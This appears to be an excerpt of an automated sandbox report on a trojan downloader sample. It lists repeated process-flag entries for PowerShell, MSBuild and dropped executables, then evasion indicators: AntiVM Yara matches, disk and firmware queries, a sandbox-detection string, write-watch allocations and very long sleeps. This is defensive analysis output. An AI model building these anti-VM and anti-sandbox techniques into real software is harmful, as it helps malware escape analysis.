Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe PID: 5904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Keywords.exe PID: 1568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Keywords.exe PID: 64, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 4456, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Keywords.exe PID: 512, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: pjmskbbdr.exe PID: 2996, type: MEMORYSTR
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Query firmware table information (likely to detect VMs)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe System information queried: FirmwareTableInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002AFD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 0000000F.00000002.1746723723.0000029A001B1000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.1910595763.000001B806521000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.1968077949.00000154E5C11000.00000004.00000800.00020000.00000000.sdmp, pjmskbbdr.exe, 0000001B.00000002.2248679548.00000000032ED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Memory allocated: 1480000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Memory allocated: 2E90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Memory allocated: 2DC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Memory allocated: 5DE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Memory allocated: 6DE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Memory allocated: 14F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Memory allocated: 2EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Memory allocated: 14F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: D10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 2970000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 4970000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 5790000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 6790000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 1650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 31C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 2F50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: C30000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2920000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: F40000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 5500000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 6500000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2400000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 24B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 44B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Memory allocated: 29A71F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Memory allocated: 29A73B60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Memory allocated: 1A944BC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Memory allocated: 1A95E510000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 1000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 2BA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 2A50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 5860000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 6860000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory allocated: 1B8048C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory allocated: 1B81E370000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 1660000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 3220000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Memory allocated: 5220000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory allocated: 2052FA50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Memory allocated: 205493C0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory allocated: 154E4020000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory allocated: 154FDA60000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory allocated: 21D3A590000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory allocated: 21D54060000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory allocated: 2EE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory allocated: 3190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory allocated: 3090000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory allocated: 6190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory allocated: 7190000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 1210000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2E20000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4E20000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 340000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Thread delayed: delay time: 922337203685477
